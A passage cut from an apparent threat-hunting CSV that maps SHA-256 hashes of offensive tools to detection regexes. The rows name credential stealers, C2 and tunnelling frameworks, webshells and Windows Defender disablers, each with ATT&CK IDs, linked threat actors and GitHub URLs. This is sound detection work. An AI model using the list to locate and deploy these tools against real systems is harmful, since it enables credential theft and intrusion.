- T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - 
T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22943" "*1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b*",".{0,1000}1eec102c2cf354bbc7ae4c188a88920bed7cabcbf91c8b8cf194c996da73ff6b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22944" "*1eee1c70a5c3d9b5110eecc51ca38009bc720c5380444bd7e022f593d2f981c9*",".{0,1000}1eee1c70a5c3d9b5110eecc51ca38009bc720c5380444bd7e022f593d2f981c9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source 
information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22945" "*1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6*",".{0,1000}1ef141bd8ce85451d8764a862ed5d16d3140735f868843cb2f96a15cd7623df6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22946" "*1ef59c9201490b379ef17e7bb62adb414e2920e3daae6e866f230567fb0c5866*",".{0,1000}1ef59c9201490b379ef17e7bb62adb414e2920e3daae6e866f230567fb0c5866.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22947" "*1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326*",".{0,1000}1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense 
Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22948" "*1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326*",".{0,1000}1ef6c1a4dfdc39b63bfe650ca81ab89510de6c0d3d7c608ac5be80033e559326.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22949" "*1ef9ec4d4ce0179495d5293ec8ad7a9bd80b5f83652b178f1871258cc78a0a9a*",".{0,1000}1ef9ec4d4ce0179495d5293ec8ad7a9bd80b5f83652b178f1871258cc78a0a9a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22950" "*1efc5368bcd9704d7df85e2e143936d6ee4509ac31a7ca6d3eb4cf3b18c5ef27*",".{0,1000}1efc5368bcd9704d7df85e2e143936d6ee4509ac31a7ca6d3eb4cf3b18c5ef27.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22951" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","22952" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*",".{0,1000}1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","22953" "*1f09a88ab2eca35f7e5abd4cc2f11a8f25cd7a060a5c3a943ee88e66fa241dd0*",".{0,1000}1f09a88ab2eca35f7e5abd4cc2f11a8f25cd7a060a5c3a943ee88e66fa241dd0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22954" "*1f0d9cbab0c3d005348e0114cf5b3695ec49e888a9ec20d5a0467b6bc257f683*",".{0,1000}1f0d9cbab0c3d005348e0114cf5b3695ec49e888a9ec20d5a0467b6bc257f683.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22955" "*1f0ff9ff279c93bf55a124a2ac36a4b7e97b77cfd7cdd221375b1449b7c286b1*",".{0,1000}1f0ff9ff279c93bf55a124a2ac36a4b7e97b77cfd7cdd221375b1449b7c286b1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - 
T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22957" "*1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f*",".{0,1000}1f17ea5b2d547497145f092cc3b7f0ed8acbb821946a5d3265423b7262f2aa4f.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","#filehash","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","22959" "*1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb*",".{0,1000}1f182f07f495949b4d2fbeb4582e7e30ee75ff7da5f1fe4773a9893c90d0f9cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22961" "*1f2338d7b628374139d373af383a1bdec1a16b43ced015849c6be4e4d90cc2c3*",".{0,1000}1f2338d7b628374139d373af383a1bdec1a16b43ced015849c6be4e4d90cc2c3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 
- TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22963" "*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*",".{0,1000}1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22964" "*1f28b88a26c282842ad06aa962b62120f44bbecece84394c2498e784ceafa526*",".{0,1000}1f28b88a26c282842ad06aa962b62120f44bbecece84394c2498e784ceafa526.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22965" "*1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed*",".{0,1000}1f29193837f8b7b8ba8c473a6949bd1520e54a2880303cd8aceabbb030f13aed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22966" "*1f29c6c323670aea8b723f59e97bb8846346cead57eca4159f7f27287017ce7d*",".{0,1000}1f29c6c323670aea8b723f59e97bb8846346cead57eca4159f7f27287017ce7d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22967" "*1f2f0252b887f796b461470b41800ed90a8f52b3ce65429e8e80e7af7b42dace*",".{0,1000}1f2f0252b887f796b461470b41800ed90a8f52b3ce65429e8e80e7af7b42dace.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22969" "*1f350bc4b39f1e89f64366e08af152badfb9756d600b5e611af2433b1e0d3687*",".{0,1000}1f350bc4b39f1e89f64366e08af152badfb9756d600b5e611af2433b1e0d3687.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22970" "*1f385acf11f8ea6673d7295be6492ea9913b525da25dcc037ea49ef4f86a9d58*",".{0,1000}1f385acf11f8ea6673d7295be6492ea9913b525da25dcc037ea49ef4f86a9d58.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","22971" "*1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f*",".{0,1000}1f38f5c7634978f31ac73800ad48c548b97dce8a7264d15fd5d2d9dea9d8416f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22972" "*1f39ce08fe915d5a346405fcacf6287c772c7c3fcb609bc34d32a5c90afe8050*",".{0,1000}1f39ce08fe915d5a346405fcacf6287c772c7c3fcb609bc34d32a5c90afe8050.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - 
TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22973" "*1f3a6d3687d57689a7ba7ff64c30fa268fa1e6fffc0021c3c01a2e0b11a069ec*",".{0,1000}1f3a6d3687d57689a7ba7ff64c30fa268fa1e6fffc0021c3c01a2e0b11a069ec.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22974" "*1f4a265fc64ca0cee0bf95e15d039a1a8c587cd1fb7b41de536226a679bed4a3*",".{0,1000}1f4a265fc64ca0cee0bf95e15d039a1a8c587cd1fb7b41de536226a679bed4a3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22976" "*1f4b9fe826113f8139be95e894e033044d0ddd185f9a2f30fcf213852f007790*",".{0,1000}1f4b9fe826113f8139be95e894e033044d0ddd185f9a2f30fcf213852f007790.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","22977" "*1f4fc2020e9da18d8783fe9e98b702229756849eb1ef87ee199a94c8ab123f10*",".{0,1000}1f4fc2020e9da18d8783fe9e98b702229756849eb1ef87ee199a94c8ab123f10.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","22978" "*1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe*",".{0,1000}1f5376413ef092ba7c8e6e6e0eab87024923fbf52600180c6452c247ada39cfe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22980" "*1f607d81f474d120730e81149d0597ad822da8fe41eacacc7dac394d0a2df4d1*",".{0,1000}1f607d81f474d120730e81149d0597ad822da8fe41eacacc7dac394d0a2df4d1.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","22981" "*1f63e243a7469526eb57f6d08a8d14fbb58290eb999247a005679809fc307edb*",".{0,1000}1f63e243a7469526eb57f6d08a8d14fbb58290eb999247a005679809fc307edb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22983" "*1f6ecaca9176f820ea33f658c34cfcce3d33cb669c8a9184b4fb431ee791f7a2*",".{0,1000}1f6ecaca9176f820ea33f658c34cfcce3d33cb669c8a9184b4fb431ee791f7a2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22985" "*1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d*",".{0,1000}1f7552f9d41f1e64d15e8cface42784b169d197992a072cf0072072dc640f58d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22986" "*1f75919c77b307ea48ba3dacb257e8b9d13c25db0456bdf9597611971f584f3b*",".{0,1000}1f75919c77b307ea48ba3dacb257e8b9d13c25db0456bdf9597611971f584f3b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22987" "*1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4*",".{0,1000}1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - 
T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22988" "*1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4*",".{0,1000}1f7c4485debf950cfd5b7442d391d71de3bdc1b041993be5238847e7d6f50ba4.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt 
Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22989" "*1f7d9978478d481767a5c0a2aee4cee9a57d52c4453ec208869ef4def523e676*",".{0,1000}1f7d9978478d481767a5c0a2aee4cee9a57d52c4453ec208869ef4def523e676.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22990" "*1f814aab831b7854e120d10e1560fb755683ec282b1b740c2021f8d1de03bd3c*",".{0,1000}1f814aab831b7854e120d10e1560fb755683ec282b1b740c2021f8d1de03bd3c.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","22991" "*1f836b4cdd973bf9a2f55082dff78600498c66597496f044dffcac82a332e4f4*",".{0,1000}1f836b4cdd973bf9a2f55082dff78600498c66597496f044dffcac82a332e4f4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22992" "*1f91cc9649031c4c80acf0d1823d439b4d49b89fc7caadf035a3260843ec950a*",".{0,1000}1f91cc9649031c4c80acf0d1823d439b4d49b89fc7caadf035a3260843ec950a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22994" "*1fac4f23feef2cd992baa85443ed71ea2fbdfc93c602719ae6b60b2e67318ec5*",".{0,1000}1fac4f23feef2cd992baa85443ed71ea2fbdfc93c602719ae6b60b2e67318ec5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22997" "*1fad05fba304c7d47366a1737745df64437909decdd85ca8aeab97a9ff55d056*",".{0,1000}1fad05fba304c7d47366a1737745df64437909decdd85ca8aeab97a9ff55d056.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22998" "*1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268*",".{0,1000}1fbe379890b750ffed5f6702f7d69be790d592ccb2a29872155cadee91dd5268.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
